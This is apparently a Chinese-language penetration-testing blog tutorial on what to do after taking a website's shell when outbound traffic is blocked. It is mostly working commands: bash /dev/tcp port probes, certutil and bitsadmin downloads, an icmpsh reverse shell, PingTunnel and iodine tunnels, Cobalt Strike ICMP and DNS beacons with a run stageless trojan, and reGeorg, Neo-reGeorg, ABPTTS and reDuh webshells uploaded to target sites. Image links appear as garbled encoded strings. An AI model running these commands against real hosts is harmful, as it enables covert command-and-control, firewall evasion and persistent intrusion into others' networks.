探测出网协议和端口

我们拿下网站的shell之后，网站的防火墙很有可能对出网端口进行了一些设置，这时候我们就要探测可以出网的端口以便反弹Shell，配置socks代理等进一步操作

到底什么是不出网？

不出网大多数是由于防火墙规则以及路由等原因导致的 主机不能访问特定外部端口或者IP（注意是主机往外访问不了，不是外面访问不了主机，很多人会理所当然的理解成主机不出网=与世隔绝） ，如果限定了ip白名单我们无能为力，如果只开放了特定的端口，我们可以对特定的出网端口进行探测和利用

出网端口探测方法论

当某个端口不出网，那么我们访问外部的主机都会被拦截，例如80和443不出网，意味着我们访问80和443端口的网站都会出错，无论对方主机是否开放80和443，对其进行端口扫描都会显示closed。 利用这个原理，如果我们想探测A主机的出网端口，我们只需要让A主机扫描我们的vps的全端口或者常用端口，如果显示开放，那么A主机的端口也一定是出网 使用 python -m http.server搭建一个持久化可监听端口，并且使用iptables将所有端口转发到8000

//将所有端口的流量都转发到 8000 端口
iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 8000
//查看 nat 表的规则
iptables -t nat -nvL
//清楚 nat 表所有规则
iptables -t nat -F
//备份 iptables 规则
iptables-save > /tmp/firewall.rules
//恢复 iptables 规则
iptables-restore < /tmp/firewall.rules

我们给主机配置出站规则，只允许8000-8004端口出网，其他端口阻止连接

57dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8s2b7f1!0z5e0h3A6m8b7f1p5#2N6f1u0Q4x3X3b7&6K9X3g2y4x3K6p5%4i4K6u0W2M7r3&6Y4" alt="image.png" />

使用任意的端口扫描工具对远程主机进行探测，发现成功探测出这5个端口

f34K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8s2b7g2u0K9x3K6k6m8b7f1t1&6y4i4q4V1g2@1S2%4g2e0b7$3x3#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

端口扫描工具

linux命令行扫描

for i in {440..449};do timeout 0.5 bash -c "echo >/dev/tcp/baidu.com/$i" && echo "$i ************************open************************" || echo "$i closed";done

for i in {21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};do timeout 0.5 bash -c "echo >/dev/tcp/baidu.com/$i" && echo "$i ************************open************************" || echo "$i closed";done

fscan masscan kscan 御剑tcp扫描等等看个人喜好 探测端口的范围可根据nmap常用端口来

grep -i "services\=" foo.xml | sed -r 's/.*services\=\"(.*)(\"\/>)/\1/g'

c1eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8s2b7f1E0n7K9$3W2m8b7f1u0X3k6$3&6E0K9s2A6Y4k6K6V1@1y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

出网协议探测

ICMP协议 vps监听tcp流量 tcpdump icmp，目标主机Ping vps如果收到消息那么icmp协议出网

27bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8s2b7f1p5$3k6p5I4m8b7f1c8c8b7$3k6t1b7Y4k6G2M7K6p5#2x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

DNS协议 windows和linux命令不同，如果能解析域名说明dns出网

Windows：nslookup、ping
Linux：nslookup、dig、ping

HTTP协议 只要能访问该地址的命令都算

linux:wget curl

windows:
certutil -urlcache -split -f 999K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0p5H3i4K6u0W2x3e0y4Q4x3V1j5I4
bitsadmin /transfer test c7bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0p5H3i4K6u0W2x3e0y4Q4x3V1j5I4i4K6t1$3L8X3u0K6M7q4)9K6b7X3y4Q4x3@1q4Q4y4f1x3I4

ICMP协议出网场景利用

如果HTTP隧道，DNS隧道等方式都失败了，但是Ping命令好用，就可以尝试ICMP隧道

使用 Icmpsh 进行命令控制

Icmpsh地址：git clone 797K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6A6L8Y4q4#2K9i4y4T1i4K6u0r3K9h3y4E0M7s2y4Z5i4K6u0W2k6$3W2@1 只能用于windows的shell反弹 使用vps关闭icmp回复 sysctl -w net.ipv4.icmp_echo_ignore_all=1否则反弹回来的Shell会一直刷新 在vps执行之前要安装impacket库这里不在陈述，执行 python2 icmpsh_m.py vps网卡eth0的ip 目标主机出网ip 在目标主机执行 icmpsh.exe -t vps公网ip -d 500 -b 30 -s 128

-t：指定远程主机 ip 
-d：请求之间的延迟，单位为毫秒，默认 200 
-b：退出前的最大空格数（未应答的 icmp 请求）
-s：最大数据缓冲区的字节大小（默认值为 64 个字节）

成功反弹交互式shell

404K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8s2b7f1y4E0g2e0k6m8b7f1c8x3b7g2Z5J5i4K6u0V1c8i4g2u0x3U0f1I4i4K6u0W2M7r3&6Y4" alt="image.png" />

使用wireshark也可以发现两者之间通信全部用的ICMP包

748K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7f1f1#2g2K6W2m8b7f1k6K9k6r3E0A6k6$3W2K6L8K6p5#2z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用PingTunnel搭建隧道

pingtunnel 是一款把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

开启正向socks代理

注意这里是正向socks，服务端指的是目标主机，客户端指的是vps 关闭 icmp 回复

sysctl -w net.ipv4.icmp_echo_ignore_all=1

服务端开启监听

pingtunnel.exe -type server -noprint 1 -nolog 1

客户端操作

./pingtunnel -type client -l :1080 -s 192.168.3.132 -sock5 1 -noprint 1 -nolog 1

518K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2q4e0j5e0u0m8b7f1x3H3k6q4N6k6i4K6g2X3K9g2y4g2x3U0p5$3i4K6u0W2M7r3&6Y4" alt="image.png" />

进行端口转发

服务端开启监听

pingtunnel.exe -type server -noprint 1 -nolog 1

客户端将服务端8000端口转发到本地8080端口

./pingtunnel -type client -l :8080 -s 192.168.3.132 -t 192.168.3.132:80 -tcp 1 -noprint 1 -nolog 1

访问本地8080端口相当于访问8000端口

f8aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2g2m8L8#2m8m8b7f1y4V1K9g2W2V1e0@1&6W2j5K6j5I4y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

当然-t参数不是只允许填服务端的ip，也可以是A通过B转发到C B是服务端 A是客户端 C是-t的参数

ICMP 上线 CobaltStrike

f01K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2u0c8P5X3y4m8b7f1q4&6b7#2S2x3K9h3u0K9z5o6R3@1x3W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

场景 192.168.3.1与 192.168.3.132为同一内网 192.168.3.128为cs，出站只能用icmp，我们要让 192.168.3.132上线只需要让其流量发送到 192.168.3.1，在又其转发icmp包到cs主机即可 让 192.168.3.132 的流量发送到 **192.168.3.1**，然后再通过icmp端口转发转发给cs就行了 配置cs监听器，注意最下方的监听端口需要设置，网上很多都是设置两个监听器，我这样配置一个就行了，6666是抓发到3.1的，5544是icmp转发到cs的

b72K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2g2h3f1#2N6m8b7f1y4C8i4K6g2X3g2o6u0T1y4f1!0c8z5e0t1I4i4K6u0W2M7r3&6Y4" alt="image.png" />

cs开启监听 ./pingtunnel -type server -noprint 1 -nolog 1 192.168.3.1开启转发 pingtunnel -type client -l :6666 -s 192.168.3.128 -t 192.168.3.128:5544 -tcp 1 -noprint 1 -nolog 1 生成stageless木马，在3.132主机运行成功上线cs

fdbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7f1q4t1x3p5y4m8b7f1b7I4k6e0N6I4k6Y4N6S2N6K6b7&6y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

可以看到内网主机之间的通信是tcp

dd4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2c8m8K9Y4g2m8b7f1g2o6L8q4W2g2z5q4W2d9K9K6R3$3y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

与cs服务器的通信为Icmp

b62K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2y4m8e0@1q4m8b7f1c8&6c8e0S2e0f1r3u0f1f1e0f1J5z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

DNS出网场景利用

DNS协议表面是解析域名返回ip，实际上可以返回任何数据，一台主机看似是不出网了，我们就可以利用它的DNS服务器和主机进行交互，将其他协议封装在DNS协议进行传输

CobaltStrike 中 DNS Beacon 的使用

准备工作：一台公网C2服务器，一个自己的域名 在进行 DNS 查询时，如果查询的域名不在 DNS 服务器本机缓存中， 就会访问互联网进行查询，然后返回结果。如果在互联网上有一台定制的服务器，那么依 靠 DNS 协议即可进行数据包的交互。从 DNS 协议的角度来看，这样的操作只是在一次次 地查询某个特定的域名并得到解析结果，但其本质问题是，预期的返回结果应该是一个 IP 地址，而事实上返回的可以是任意的字符串，包括加密的 C&C 指令。 具体实现就是利用NS记录把dns服务器定向为我们自己的服务器，这样就可以自定义返回内容 小tips： 网上的做法就是设置一个A记录指向自己的ip，然后ns记录指向自己的域名

556K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2S2$3K9V1c8m8b7f1u0z5i4K6g2X3N6h3W2b7c8o6p5^5y4U0b7H3i4K6u0W2M7r3&6Y4" alt="image.png" />

然后配置一个dns监听器，然后生成stagerless的马然后上线

250K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7g2c8A6c8U0g2m8b7f1y4G2K9p5N6x3h3W2m8b7g2e0M7K6y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

其实这种做法有点多此一举，A记录域名那里完全可以置空，照样可以上线，如果CS默认不让为空，你可以把ip写个1或者任意ip试一下照样能上线，同理关于HTTP的马以及其他类型的马，只要是生成stagerless的马，第二个ip都可以置空，因为第一个ip是指定马的反弹ip，第二个Ip是为了给stager的马接收payload用，而stagerless的马是完整了不需要再次通信接收paylpad 默认情况下上线之后主机是黑色的，需要执行以下两条命令显示出主机信息

6ceK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8w2b7f1A6D9d9U0y4m8b7f1q4d9f1o6l9$3k6h3N6K6c8e0l9I4y4#2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

9f0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7f1I4o6g2o6q4m8b7f1t1K6L8V1S2z5h3V1&6s2x3o6x3@1z5q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

利用iodine搭建隧道

项目地址：GitHub - yarrick/iodine: Official git repo for iodine dns tunnel 下载到linux之后 make && make install进行安装即可 执行以下命令启动服务端

iodined -f -c -P helloworld 192.168.10.1 ns.kaeiy.xyz -DD

-f：在前台运行 -c：禁止检查所有传入请求的客户端 IP 地址 -P：指定密码 -D：指定调试级别。-DD 指第二级，D 的数量随等级增加 这里的 192.168.10.1 是自定义的局域网虚拟 IP 地址

d39K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7h3q4#2L8o6W2m8b7f1c8o6e0p5!0z5i4K6u0V1g2V1y4q4y4K6b7$3i4K6u0W2M7r3&6Y4" alt="image.png" />

配置完成之后访问如下网站进行测试 [bd9K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0L8$3c8W2i4K6u0W2K9%4u0&6L8#2)9J5k6i4y4W2i4K6u0r3K9h3!0V1K9h3&6W2i4K6u0r3j5$3S2W2j5$3E0Q4x3X3c8A6N6q4)9J5c8W2)9#2c8q4)9J5z5r3S2@1N6s2m8K6i4K6y4m8i4K6u0r3i4K6u0r3j5$3!0V1k6g2)9J5k6h3E0J5P5h3!0Q4x3X3g2K6k6g2)9J5c8X3W2G2k6r3W2F1k6g2)9J5c8X3y4Z5k6h3y4C8i4K6u0V1K9i4c8Q4x3V1k6Q4x3U0V1`.

7a4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7f1A6$3h3f1E0m8b7f1c8e0e0X3q4^5z5f1S2%4c8e0b7H3y4q4)9J5k6i4m8F1k6H3`.`." alt="image.png" />

服务端启动成功之后发现我们电脑上多了一块网卡

a30K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7h3f1I4d9%4m8m8b7f1t1I4g2W2k6Z5x3g2m8c8x3o6V1K6y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

客户端连接服务端

iodine.exe -f -P helloworld -M 200 ns.kaeiy.xyz

6b7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7f1S2j5f1p5#2m8b7f1f1J5i4K6u0V1L8i4N6i4e0p5&6u0x3K6V1I4i4K6u0W2M7r3&6Y4" alt="image.png" />

发现客户端也多了一块网卡

83cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7h3u0b7c8o6k6m8b7f1u0i4P5W2y4n7h3p5u0k6j5K6x3I4x3g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

此时服务端可ping通客户端

b53K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7f1y4*7c8g2W2m8b7f1t1H3b7$3&6X3z5f1k6U0c8e0j5^5y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

curl也完全正常

b16K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7h3k6D9e0W2y4m8b7f1c8$3k6U0q4A6K9g2m8K6c8e0l9%4z5g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

目标不出网场景之HTTP隧道

当我们拿到shell，目标又完全不出网，就只能用HTTP隧道

reGeorg

项目地址：GitHub - sensepost/reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. reGeorg是采用python2开发的http正向代理工具 上传代理脚本到目标网站，使用执行以下命令连接即可

python2 reGeorgSocksProxy.py -l 0.0.0.0 -p 1080 -u 64eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3V1k6@1N6h3&6F1k6h3I4Q4x3X3g2F1L8%4y4G2j5$3E0W2N6q4)9J5k6i4m8Z5M7l9`.`.

5fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7f1@1H3N6$3c8m8b7f1y4j5K9f1k6i4e0o6N6I4g2e0b7#2y4g2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

使用代理工具连接服务器即可

886K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7h3k6S2z5g2y4m8b7f1y4*7i4K6g2X3c8p5#2Q4x3X3c8u0y4X3M7#2y4U0N6Q4x3X3g2H3L8X3M7`." alt="image.png" />

Neo-reGeorg

是reGrorg的升级版，具有传输流量加密，支持python2/3等许多优点 项目地址：GitHub - L-codes/Neo-reGeorg: Neo-reGeorg is a project that seeks to aggressively refactor reGeorg 使用命令生成我们自定义key的脚本

python3 neoreg.py generate -k admin12345678

将脚本放到目标网站下，使用命令进行连接

python3 neoreg.py -l 0.0.0.0 -p 1080 -k admin12345678 -u bd9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3V1k6@1N6h3&6F1k6h3I4Q4x3X3g2H3K9s2l9`.

2ddK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7g2l9%4b7U0k6m8b7f1c8p5f1#2k6e0g2o6W2g2d9e0b7J5y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

自定义访问页面

自己先在脚本目录下随便创建一个html文件 生成脚本执行以下命令

python3 neoreg.py generate -k admin --file test.html --httpcode 200

访问脚本就会出现代码雨

0f2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7g2g2t1y4f1S2m8b7f1c8%4K9q4)9J5k6q4y4u0x3g2c8U0y4U0V1#2i4K6u0W2M7r3&6Y4" alt="image.png" />

ABPTTS

一款基于 SSL 加密的 HTTP 端口转发工具，全程通信数据加密，比reGerog都要稳定。使用 python2 编写，但是该工具只支持 aspx 和jsp 脚本的网站 项目地址：GitHub - nccgroup/ABPTTS: TCP tunneling over HTTP/HTTPS for web application servers 需要提前安装两个库，如果在kali下安装用管理员安装

python2 -m pip install pycryptodemo
python2 -m pip install httplib2

执行以下命令生成webshell

python2 abpttsfactory.py -o webshell

将abptts.jsp文件复制到网站目录下进行访问

ab7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8a6b7f1@1&6K9V1y4m8b7f1q4@1e0@1^5@1i4K6u0V1e0U0N6q4x3K6M7%4i4K6u0W2M7r3&6Y4" alt="image.png" />

执行以下命令将远程3389端口映射到本地

python2 abpttsclient.py -c webshell/config.txt -u c87K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3@1p5^5x3o6R3H3i4K6u0r3j5h3u0H3N6s2c8K6i4K6u0W2K9Y4y4H3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5k6r3k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7x3e0t1%4i4K6u0W2x3q4)9J5k6e0m8Q4x3X3f1I4i4K6y4m8x3K6x3^5z5g2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3@1p5K6x3K6R3&6i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5k6q4)9J5k6s2g2F1M7$3q4X3k6i4c8D9M7H3`.`.

mstsc连接本地127.0.0.1即可远程连接主机

f58K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7f1q4Z5g2Y4N6m8b7f1c8V1k6o6m8s2c8%4j5&6j5K6V1I4y4W2)9J5k6i4m8F1k6H3`.`." alt="image.png" />

reDuh

项目地址：GitHub - sensepost/reDuh: Create a TCP circuit through validly formed HTTP requests 将对应的脚本上传到网站目录，访问如下

2f3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4W2j5#2)9J5k6r3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3#2Y4i4K6u0r3M7$3W2F1i4K6u0r3e0e0l9H3i4K6u0r3x3o6q4Q4x3V1j5%4y4#2)9J5c8Y4N6w2k6K6m8o6x3W2b7#2k6r3c8e0b7g2A6#2g2#2)9#2k6V1q4m8b7h3H3H3e0U0l9K6b7@1S2%4z5o6R3$3i4K6u0W2M7r3&6Y4" alt="image.png" />

使用 reDuhClient.jar 连接脚本地址

java -jar reDuhClient.jar cc9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0y4Q4x3X3f1I4x3K6u0Q4x3@1p5^5x3o6R3H3i4K6u0r3M7X3g2p5N6h3S2Q4x3X3g2B7M7%4l9`.

